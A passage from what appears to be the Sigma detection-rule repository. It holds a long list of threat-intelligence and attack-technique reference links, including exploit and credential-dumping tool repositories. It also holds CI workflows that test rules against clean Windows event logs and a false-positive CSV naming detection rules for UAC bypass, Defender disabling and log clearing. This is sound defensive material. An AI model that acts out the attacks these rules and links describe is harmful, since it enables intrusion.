https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/ - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware - https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/ - https://www.security.com/threat-intelligence/medusa-ransomware-attacks - 
https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/ - https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/ - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns - https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/ - https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications - https://www.virustotal.com/gui/file/29837d0d3202758063185828c8f8d9e0b7b42b365c8941cc926d2d7c7bae2fb3 - https://manual.cs50.io/2/personality - https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures - https://en.wikipedia.org/wiki/Right-to-left_override - https://www.attackiq.com/2023/09/20/emulating-rhysida/ - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038 - https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging - https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy - https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4 - https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/ - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/ - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations - https://github.com/fortra/impacket/blob/ff8c200fd040b04d3b5ff05449646737f836235d/examples/secretsdump.py - https://www.virustotal.com/gui/file/54d60fd58d7fa3475fa123985bfc1594df26da25c1f5fbc7dfdba15876dd8ac5/behavior - https://github.com/logangoins/Krueger/tree/main - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf - 
https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events - https://www.geeksforgeeks.org/how-to-kill-processes-on-the-linux-desktop-with-xkill/ - https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-guardduty-detector-is-enabled - https://github.com/varwara/CVE-2024-35250 - https://linux.die.net/man/8/auditct - https://www.broadcom.com/support/security-center/protection-bulletin/funksec-ransomware - https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/ - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed - https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash - https://portswigger.net/daily-swig/vmware-horizon-under-attack-as-china-based-ransomware-group-targets-log4j-vulnerability - https://bazaar.abuse.ch/browse/tag/one/ - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/ - https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/ - https://www.nextron-systems.com/2025/07/29/detecting-the-most-popular-mitre-persistence-method-registry-run-keys-startup-folder/ - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm - https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/ - https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication - https://github.com/search?q=devcon+disable+VMWVMCIHOSTDEV - https://www.picussecurity.com/resource/blog/as-rep-roasting-attack-explained-mitre-attack-t1558.004 - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins - https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers - 
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732 - https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/reagentc-command-line-options?view=windows-11 - https://jgspiers.com/audit-group-policy-changes/ - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/114404382/config-vpn-ssl-settings - https://github.com/arttoolkit/arttoolkit.github.io/blob/16d6230d009e58fd6f773f5317fd4d14c1f26004/_wadcoms/AMSI-Bypass-Jscript_amsienable.md - https://www.hexacorn.com/blog/2025/06/14/wermgr-exe-boot-offdmpsvc-dll-lolbin/ - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ - https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/ - https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior - https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1124/T1124.md - https://x.com/0gtweet/status/1564131230941122561 - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741 - https://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins - https://github.com/TwoSevenOneT/WSASS/blob/2c8fd9fa32143e7bc9f066e9511c6f8a57bc64b5/WSASS.cpp#L251 - https://www.man7.org/linux/man-pages/man1/systemctl.1.html - https://gtfobins.github.io/gtfobins/rsync/#shell - https://www.trendmicro.com/en_us/research/25/f/water-curse.html - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpwritedump - https://www.youtube.com/watch?v=uSYvHUVU8xY - 
https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616 - https://man7.org/linux/man-pages/man1/dmesg.1.html - https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/ - https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf - https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf - https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/ - https://docs.github.com/en/pages/getting-started-with-github-pages/creating-a-github-pages-site - https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/ - https://apophis133.medium.com/powershell-script-tactical-rmm-installation-45afb639eff3 - https://bazaar.abuse.ch/sample/7bde840c7e8c36dce4c3bac937bcf39f36a6f118001b406bfbbc25451ce44fb4/ - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation - https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/ - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials - https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/ - https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure - https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations - https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity - https://hawktrace.com/blog/CVE-2025-59287-UNAUTH - https://docs.python.org/3/library/http.server.html - 
https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr - https://ptsecurity.com/research/pt-esc-threat-intelligence/striking-panda-attacks-apt31-today - https://firecompass.com/crushftp-vulnerability-cve-2025-54309-securing-file-transfer-services/ - https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country - http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://securelist.com/passiveneuron-campaign-with-apt-implants-and-cobalt-strike/117745/ - https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/ - https://restic.net/ - https://woshub.com/disable-credential-guard-windows/ - https://labs.yarix.com/2025/06/doppelganger-an-advanced-lsass-dumper-with-process-cloning/ - https://www.virustotal.com/gui/file/d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97 - https://tria.ge/241231-j9yatstqbm/behavioral1 - https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install - https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html - https://cloud.google.com/blog/topics/threat-intelligence/apt41-initiates-global-intrusion-campaign-using-multiple-exploits/ - https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/ - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/start - 
https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019 - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf - https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ - https://cert.gov.ua/article/6277849 - https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0 - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::SecurityPage_AutoDetect - https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Amazon%20Web%20Services/Analytic%20Rules/AWS_GuardDutyDisabled.yaml - https://research.splunk.com/endpoint/395ed5fe-ad13-4366-9405-a228427bdd91/ - https://help.fortinet.com/fsiem/Public_Resource_Access/7_4_0/rules/PH_RULE_AWS_GuardDuty_Detector_Deletion.htm - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1 - https://www.howtogeek.com/137270/50-file-extensions-that-are-potentially-dangerous-on-windows - https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/ - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack - https://gist.github.com/travisbgreen/82b68bac499edbe0b17dcbfa0c5c71b7 - https://stackoverflow.com/questions/66011412/how-to-clear-a-event-log-in-powershell-7 - https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100 - https://www.pcrisk.com/removal-guides/31853-funklocker-funksec-ransomware - https://www.joesandbox.com/analysis/1467354/0/html - https://help.fortinet.com/fsiem/Public_Resource_Access/7_2_1/rules/PH_RULE_AWS_Management_Console_Brute_Force_of_Root_User_Identity.htm - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently - 
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025 - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44 - https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous - https://us-cert.cisa.gov/ncas/alerts/aa21-259a - https://research.splunk.com/endpoint/3742ebfe-64c2-11eb-ae93-0242ac130002 - https://redcanary.com/threat-detection-report/techniques/installer-packages/ - https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/113121765/config-vpn-ssl-web-portal - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-table-transact-sql?view=sql-server-ver16 - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions - https://blog.sekoia.io/scattered-spider-laying-new-eggs/ - https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection - https://www.binarly.io/blog/design-issues-of-modern-edrs-bypassing-etw-based-solutions - https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48 - https://labs.watchtowr.com/expression-payloads-meet-mayhem-cve-2025-4427-and-cve-2025-4428/?123 - https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1 - https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/ - https://man7.org/linux/man-pages/man8/setcap.8.html - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/ - 
http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/ - https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository - https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis - https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration - https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/ - https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis - https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample - https://viz.greynoise.io/tags/hello-world-scraper-botnet?days=30 - https://adsecurity.org/?p=1785 - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-using-group-policy - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules - https://reliaquest.com/blog/threat-spotlight-cve-2025-54309-crushftp-exploit/ - https://app.any.run/tasks/8901e2d5-0c5a-48ba-a8e9-10b5ed7e06f4 - https://huntress.com/blog/esxi-vm-escape-exploit - https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/ - https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/ - https://docs.datadoghq.com/security/default_rules/719-39f-9cd/ - https://support.kaspersky.com/KES4Linux/12.0.0/en-US/197929.htm - https://taggart-tech.com/evildeno/ - https://medium.com/@ninnesoturan/detecting-ipv6-dns-takeover-a54a6a88be1f - 
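https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7 - https://app.any.run/tasks/ea944b89-69d8-49c8-ac1f-5c76ad300db2
================================================
FILE: .github/workflows/goodlog-tests.yml
================================================
# Goodlog (false-positive) tests: run the Windows, emerging-threats and threat-hunting rule
# sets against clean Windows event-log baselines published in NextronSystems/evtx-baseline.
# matchgrep.sh then drops every finding of level "low" and every finding listed in
# .github/workflows/known-FPs.csv; the job fails if anything is left over.
name: Goodlog Tests

on: [push, pull_request, merge_group, workflow_dispatch]

# Least privilege: every job only checks out the repository and downloads public release
# assets. Nothing here writes to the repository, issues, pull requests or packages.
permissions:
  contents: read

env:
  # Release tag of NextronSystems/evtx-baseline from which the checker binary and all
  # baseline archives are downloaded.
  EVTX_BASELINE_VERSION: v0.8.4

# NOTE(review): the checker binary and the baseline archives are fetched by release tag
# only; nothing verifies a checksum or signature before the binary is executed on the
# runner, so a replaced release asset would run unnoticed. Pinning an expected sha256 per
# asset and checking it with `sha256sum -c` before the chmod/exec would close that gap.
jobs:
  check-baseline-win7:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
      - name: Download evtx-sigma-checker
        run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
      - name: Download and extract Windows 7 32-bit baseline
        run: |
          wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win7-x86.tgz
          tar xzf win7-x86.tgz
      - name: Check for Sigma matches in baseline
        run: |
          chmod +x evtx-sigma-checker
          ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win7_x86/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
      - name: Show findings excluding known FPs
        run: |
          chmod +x .github/workflows/matchgrep.sh
          ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv

  check-baseline-win10:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
      - name: Download evtx-sigma-checker
        run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
      - name: Download and extract Windows 10 baseline
        run: |
          wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win10-client.tgz
          tar xzf win10-client.tgz
      - name: Check for Sigma matches in baseline
        run: |
          chmod +x evtx-sigma-checker
          ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Client/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
      - name: Show findings excluding known FPs
        run: |
          chmod +x .github/workflows/matchgrep.sh
          ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv

  check-baseline-win11:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
      - name: Download evtx-sigma-checker
        run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
      - name: Download and extract Windows 11 baseline
        run: |
          wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win11-client.tgz
          tar xzf win11-client.tgz
      - name: Check for Sigma matches in baseline
        run: |
          chmod +x evtx-sigma-checker
          ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Win11/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
      - name: Show findings excluding known FPs
        run: |
          chmod +x .github/workflows/matchgrep.sh
          ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv

  check-baseline-win11-2023:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
      - name: Download evtx-sigma-checker
        run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
      - name: Download and extract Windows 11 baseline
        run: |
          wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win11-client-2023.tgz
          tar xzf win11-client-2023.tgz
      - name: Check for Sigma matches in baseline
        run: |
          chmod +x evtx-sigma-checker
          ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Win11_2023/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
      - name: Show findings excluding known FPs
        run: |
          chmod +x .github/workflows/matchgrep.sh
          ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv

  check-baseline-win2022:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
      - name: Download evtx-sigma-checker
        run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
      - name: Download and extract Windows 2022 baseline
        run: |
          wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-evtx.tgz
          tar xzf win2022-evtx.tgz
      - name: Check for Sigma matches in baseline
        run: |
          chmod +x evtx-sigma-checker
          ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win2022-evtx/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
      - name: Show findings excluding known FPs
        # chmod added for consistency with the other jobs, which otherwise relied on
        # the executable bit surviving the checkout.
        run: |
          chmod +x .github/workflows/matchgrep.sh
          ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv

  check-baseline-win2022-domain-controller:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
      - name: Download evtx-sigma-checker
        run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
      - name: Download and extract Windows 2022 baseline
        run: |
          wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-ad.tgz
          tar xzf win2022-ad.tgz
      - name: Check for Sigma matches in baseline
        run: |
          chmod +x evtx-sigma-checker
          ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
      - name: Show findings excluding known FPs
        # chmod added for consistency with the other jobs, which otherwise relied on
        # the executable bit surviving the checkout.
        run: |
          chmod +x .github/workflows/matchgrep.sh
          ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv

  check-baseline-win2022-0-20348-azure:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v5
      - name: Download evtx-sigma-checker
        run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker
      - name: Download and extract Windows 2022.0.20348 Azure baseline
        run: |
          wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz
          tar xzf win2022-0-20348-azure.tgz
      - name: Check for Sigma matches in baseline
        run: |
          chmod +x evtx-sigma-checker
          ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json
      - name: Show findings excluding known FPs
        run: |
          chmod +x .github/workflows/matchgrep.sh
          ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv
================================================
FILE: .github/workflows/greetings.yml
================================================
# Posts a welcome comment on a contributor's first issue or first pull request.
name: Greet First-Time Contributors

on:
  pull_request:
    types:
      - opened
  issues:
    types:
      - opened

permissions:
  issues: write
  pull-requests: write
  # NOTE(review): id-token: write hands the job an OIDC token. The only step here posts
  # comments; confirm the action actually needs it, otherwise drop it (least privilege).
  id-token: write
  contents: read

jobs:
  greeting:
    name: Greet First-Time Contributors
    # Pull requests are only greeted when they come from a fork (head repo differs from
    # this repository); issues are always greeted.
    if: github.event_name == 'issues' || (github.event_name == 'pull_request' && github.event.pull_request.head.repo.full_name != github.repository)
    runs-on: ubuntu-latest
    steps:
      - uses: actions/first-interaction@v3
        with:
          issue_message: |
            Welcome :wave: It looks like this is your first issue on the Sigma rules repository!
            The following repository accepts issues related to `false positives` or `rule ideas`. If you're reporting an issue related to the pySigma library please consider submitting it [here](https://github.com/SigmaHQ/pySigma)
            Thanks for taking the time to open this issue, and welcome to the Sigma community! :smiley:
          pr_message: |
            Welcome :wave: It looks like this is your first pull request on the Sigma rules repository!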
Please make sure to read the [SigmaHQ conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/) to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval. Thanks again, and welcome to the Sigma community! :smiley: ================================================ FILE: .github/workflows/known-FPs.csv ================================================ RuleId;RuleName;MatchString 8e5e38e4-5350-4c0b-895a-e872ce0dd54f;Msiexec Initiated Connection;.* ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94;Suspicious WSMAN Provider Image Loads;.* db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;python-3 db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;.* 1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon e28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell 8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;(sysmon-intense\.xml|sysmonconfig-trace\.xml) 8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon) 4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_ 36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR 73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote 6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\Integration\\Integrator\.exe 00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4 Task: 0 162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\.exe cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\.49\.150\.241 bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated 
Connection;151\.101\.64\.223 bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;146\.75\.117\.55 9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\.exe 9494479d-d994-40bf-a8b1-eea890237021;Scheduled Task Creation From Potential Suspicious Parent Location;.* 81325ce1-be01-4250-944f-b4789644556f;Suspicius Schtasks From Env Var Folder;TVInstallRestore 6ea3bf32-9680-422d-9f50-e90716b12a66;UAC Bypass Via Wsreset;EventType: DeleteKey 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8;Suspicious Add Scheduled Task From User AppData Temp;TVInstallRestore c187c075-bb3e-4c62-b4fa-beae0ffc211f;Deteled Rule in Windows Firewall with Advanced Security;Dropbox.*\\netsh\.exe 69aeb277-f15f-4d2d-b32a-55e883609563;Disabling Windows Event Auditing;Computer: .* ac175779-025a-4f12-98b0-acdaeb77ea85;PowerShell Script Run in AppData;\\Evernote- 1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;target\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe 949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon 949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: WinDev2310Eval fdbf0b9d-0182-4c43-893b-a1eaab92d085;Newly Registered Protocol Handler;.* 
100ef69e-3327-481c-8e5c-6d80d9507556;System Eventlog Cleared;.* 52a85084-6989-40c3-8f32-091e12e17692;Suspicious Usage of CVE_2021_34484 or CVE 2022_21919;Computer: Agamemnon 573df571-a223-43bc-846e-3f98da481eca;Copy a File Downloaded From Internet;7z\.exe 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8;Image Load of VSS Dll by Uncommon Executable;SetupFrontEnd\.exe 1a31b18a-f00c-4061-9900-f735b96c99fc;Remote Access Tool Services Have Been Installed - System;ServiceName: TeamViewer c8b00925-926c-47e3-beea-298fd563728e;Remote Access Tool Services Have Been Installed - Security;ServiceName: TeamViewer b69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;msedge\.exe b69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;firefox\.exe b69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;7z\.exe 65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;powershell\.exe 65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: WIN-FPV0DSIC9O6.sigma.fr a62b37e0-45d3-48d9-a517-90c1a1b0186b;Eventlog Cleared;Computer: .* 4eec988f-7bf0-49f1-8675-1e6a510b3a2a;Potential PendingFileRenameOperations Tamper;target\.exe 4eec988f-7bf0-49f1-8675-1e6a510b3a2a;Potential PendingFileRenameOperations Tamper;target\.tmp 48bfd177-7cf2-412b-ad77-baf923489e82;Image Load of VSS Dll by Uncommon Executable;SetupFrontEnd.exe 87911521-7098-470b-a459-9a57fc80bdfd;Sysmon Configuration Updated;.* 0eb46774-f1ab-4a74-8238-1155855f2263;Disable Windows Defender Functionalities Via Registry Keys;.* e9d4ab66-a532-4ef7-a502-66a9e4a34f5d;NTLMv1 Logon Between Client and Server;.* 